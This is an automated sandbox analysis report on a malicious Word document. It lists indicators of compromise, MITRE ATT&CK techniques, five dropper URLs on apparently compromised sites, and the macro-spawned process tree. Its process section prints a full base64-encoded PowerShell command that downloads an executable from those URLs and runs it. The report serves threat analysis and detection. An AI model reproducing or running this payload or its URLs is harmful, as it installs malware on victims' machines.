c7e697ca3514a77799cfa6cd5fcffd14116ca8f6d0e8dd0ab3ec834863c37ca1

General

Target

c7e697ca3514a77799cfa6cd5fcffd14116ca8f6d0e8dd0ab3ec834863c37ca1.doc
Sample

200129-rg7cra3mk6
SHA256

c7e697ca3514a77799cfa6cd5fcffd14116ca8f6d0e8dd0ab3ec834863c37ca1

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

http://blinkro.eu/wp-content/hMDRkCt/

exe.dropper

http://blasmontavez.com/wp-includes/ep0/

exe.dropper

http://luxuryflower.net/wp-content/cgNoUgY/

exe.dropper

http://gostareh.org/old/f7tSe81/

exe.dropper

http://hindwalkerphoto.com/wp-content/v1d8mo/

Signatures

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

4928 WINWORD.EXE
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

WINWORD.EXE

pid process

4928 WINWORD.EXE

pid	process
4928	WINWORD.EXE

pid	process
4928	WINWORD.EXE

Process spawned unexpected child process 1 IoCs

Processes:

PoWERsheLL.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2116	5032	PoWERsheLL.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

PoWERsheLL.exe

description pid process

Token: SeDebugPrivilege 2116 PoWERsheLL.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

PoWERsheLL.exe

pid process

2116 PoWERsheLL.exe

description	pid	process
Token: SeDebugPrivilege	2116	PoWERsheLL.exe

pid	process
2116	PoWERsheLL.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c7e697ca3514a77799cfa6cd5fcffd14116ca8f6d0e8dd0ab3ec834863c37ca1.doc" /o ""
1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Checks processor information in registry
PID:4928

C:\Windows\System32\WindowsPowerShell\v1.0\PoWERsheLL.exe
PoWERsheLL -e JABRAGsAdwBtAHAAaQBsAHUAawA9ACcAWgBkAGoAZQBlAG8AeABtAHkAJwA7ACQATwBtAHYAcABxAGQAdgB0AHMAbwBqACAAPQAgACcAMwAxADYAJwA7ACQAVABqAG0AaQBhAGkAcwBxAGIAYQBsAD0AJwBSAGQAdAB3AGYAdABlAHoAbgBwAG4AdQAnADsAJABGAGwAagByAHQAZABuAHAAaQBlAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABPAG0AdgBwAHEAZAB2AHQAcwBvAGoAKwAnAC4AZQB4AGUAJwA7ACQARQByAHcAawB5AGwAeABjAGMAYwB6AD0AJwBSAHcAZwB6AHIAZwBtAG4AbABkACcAOwAkAEwAdwB1AGEAeABiAGwAbAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjAHQAJwApACAATgBlAHQALgBXAEUAQgBDAEwAaQBlAE4AdAA7ACQAUwB0AGgAdwB2AHMAdABqAHYAYwA9ACcAaAB0AHQAcAA6AC8ALwBiAGwAaQBuAGsAcgBvAC4AZQB1AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGgATQBEAFIAawBDAHQALwAqAGgAdAB0AHAAOgAvAC8AYgBsAGEAcwBtAG8AbgB0AGEAdgBlAHoALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGUAcAAwAC8AKgBoAHQAdABwADoALwAvAGwAdQB4AHUAcgB5AGYAbABvAHcAZQByAC4AbgBlAHQALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AYwBnAE4AbwBVAGcAWQAvACoAaAB0AHQAcAA6AC8ALwBnAG8AcwB0AGEAcgBlAGgALgBvAHIAZwAvAG8AbABkAC8AZgA3AHQAUwBlADgAMQAvACoAaAB0AHQAcAA6AC8ALwBoAGkAbgBkAHcAYQBsAGsAZQByAHAAaABvAHQAbwAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHYAMQBkADgAbQBvAC8AJwAuACIAcwBwAGwAYABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABPAGIAbwBnAHUAegBvAGsAdABvAHoAZQA9ACcAUgB1AG8AYQByAHcAdQBoAG0AYwBoACcAOwBmAG8AcgBlAGEAYwBoACgAJABFAGYAcQBwAHYAdQBhAHAAegBkAGwAdgAgAGkAbgAgACQAUwB0AGgAdwB2AHMAdABqAHYAYwApAHsAdAByAHkAewAkAEwAdwB1AGEAeABiAGwAbAAuACIAZABvAHcAbgBMAE8AQQBgAEQARgBpAGAATABFACIAKAAkAEUAZgBxAHAAdgB1AGEAcAB6AGQAbAB2ACwAIAAkAEYAbABqAHIAdABkAG4AcABpAGUAKQA7ACQATgBkAGIAdABuAGcAcQBqAGoAagB3AGgAPQAnAEEAcwBkAHgAYgBpAGUAcAByAHkAJwA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACAAJABGAGwAagByAHQAZABuAHAAaQBlACkALgAiAGwARQBOAGAARwBUAEgAIgAgAC0AZwBlACAAMgA3ADcANQA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBDAHIAZQBBAGAAVABlACIAKAAkAEYAbABqAHIAdABkAG4AcABpAGUAKQA7ACQAWgBoAG8AbAB6AGYAZQBiAGcAcwB2AG0APQAnAEUAaABsAHMAdABvAG0AdQBwAGoAZgBmAGcAJwA7AGIAcgBlAGEAawA7ACQATQBjAGoAYQBtAHIAYwB2AHgAdwBjAHkAagA9ACcASQBrAGQAagB6AGkAZwBnAHEAeQBoAGUAcgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABUAHkAbQBkAHUAcQBtAGwAbAA9ACcATQBuAHYAcQBwAGMAYQBxACcA
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:2116

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads